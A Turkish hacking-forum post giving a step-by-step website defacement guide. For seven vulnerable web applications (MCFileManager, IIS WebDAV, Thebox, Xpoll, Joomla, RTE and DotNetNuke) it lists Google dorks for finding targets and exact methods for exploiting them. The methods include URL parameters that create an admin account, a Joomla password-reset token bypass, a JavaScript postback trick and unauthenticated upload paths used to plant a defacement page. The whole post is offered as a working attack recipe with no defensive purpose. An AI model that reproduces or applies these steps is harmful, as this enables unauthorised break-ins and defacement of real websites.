İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

IIS , Token , Dotnuke ve birkaç basit upload açığı - & FoReVeR-02 &

13-02-2014 10:02
#1
FoReVeR02 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Mesajlar:
1.670
Teşekkür (Etti):
362
Teşekkür (Aldı):
253
Konular:
358
Ticaret:
(0) %
1 - [MCFileManager]

Dork

inurl:/tiny_mce/plugins/filemanager/


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri seçilir . URL'den " filemanager/ " den sonraki bölüm silinir . Karşımıza gelen sayfada " Simple Example " yazısının sağ tarafında [MCFileManager] butonu tıklanır . Username password isterse deneme yanılma yapılır . Çıkmazsa index upload edilir .

2 - ISS

Dork

intext:"404 Object Not Found"
Microsoft-IIS/5.0"Microsoft-IIS/* server at"
intitle:index.of"Microsoft-IIS/4.0"
intitle:index.of"Microsoft-IIS/5.0 server at"
intitle:"Welcome to IIS 4.0"
intitle:"Welcome to Windows 2000 Internet Services"


Yöntem

ISS açığı olan site belirlenir , " Bilgisayarım " açılır . Sağ click tıklanır , " Ag Konumu Ekle " tıklanır . İki kere " İleri " tıklanır . " İnternet ya da Ağ Adresi " bölümüne ISS açığı bulunan site yazılır . Bağlantı kurulur . Bağlantı klasörü açılır . İndex içine atılır .

3 - Thebox

Dork

inurl:thebox/thebox.php


Yöntem


Dork aratılır . Çıkan sonuçlardan sonu " /thebox/thebox.php/ " olan bir site seçilir . Site URL'sinin sonuna " /admin.php?act=write&username=hack&password=byqta&a " kodu eklenir . İstenirse direk edit atılır . Aksi halde " View Log " yanındaki " Click Here " butonu tıklanır . İçlerinden herhangi birinin karşısındaki " Edit Shout " tıklanır . İndex kodları yapıştırılır .

4 - Xpoll

Dork

xpoll veya inurl:xpoll/admin/images


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Sağ üst köşeden " Delete All İmages " butonu tıklanır . Sonra " Upload An İmage " tıklanır . İndex seçilir . Site URL'sinden " admin " ve " index.php " silinir . İndexe ulaşılır .

5 - Token

Dork

"Joomla Overview site:"
inurl:*quot;com_idoblog*quot;
inurl:"com_idoblog" siterg
inurl:index.php?viewarticle siterg


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Site URL'sine " /index.php?option=com_user&view=reset&layout=confir m " kodu yazılır . Token kısmına " ' " yazılır ve " Submit " tıklanır . Password yenileme sayfasına iki yeni password yazılır , password sıfırlanır . Joomla açığı olduğu için panel sabittir , URL sonuna " /administrator " eklenir . Username tahmin işidir . Password ne yazdıysanız odur . Joomla paneline giriş yapılır .

6 - RTE

Dork

inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/


Yöntem

Dorklar aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitlerin URL'leri " /RTE " yazan yere silinir . Silindikten sonra URL'ye " /rte/RTE_popup_file_atch.asp " kodu yazılır . Çıkan ekrandan index upload edilir . Sağ bölmede gelen URL açılır , zone alınır .

7 - Dotnuke


Dork

inurl:/tabid/36/language/en-US/Default.aspx


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitelerin URL'lerine " /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx " kodu eklenir , enter tıklanır . Gelen sonuçta üç kutucuktan en alttaki seçilir , sayfa yenilendikten sonra arama çubuğundaki her şey silinir , çubuğa " ************:__doPostBack('ctlURL$cmdUpload','' ) " kodu yazılır . Gelen sayfada .txt olarak index upload edilir . Site URL'sinin sonuna " /Portals/0/index.txt " / " /Portals/1/.txt " kodu eklenir , zone alınır .

Kullanıcı İmzası
Sonsuza dek ve daima...





Do You need help?
then it is the right place
& FoReVeR-02 &
Forensic Expert (Data Recovery) and Web Programmer
Sanayeryokburada Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı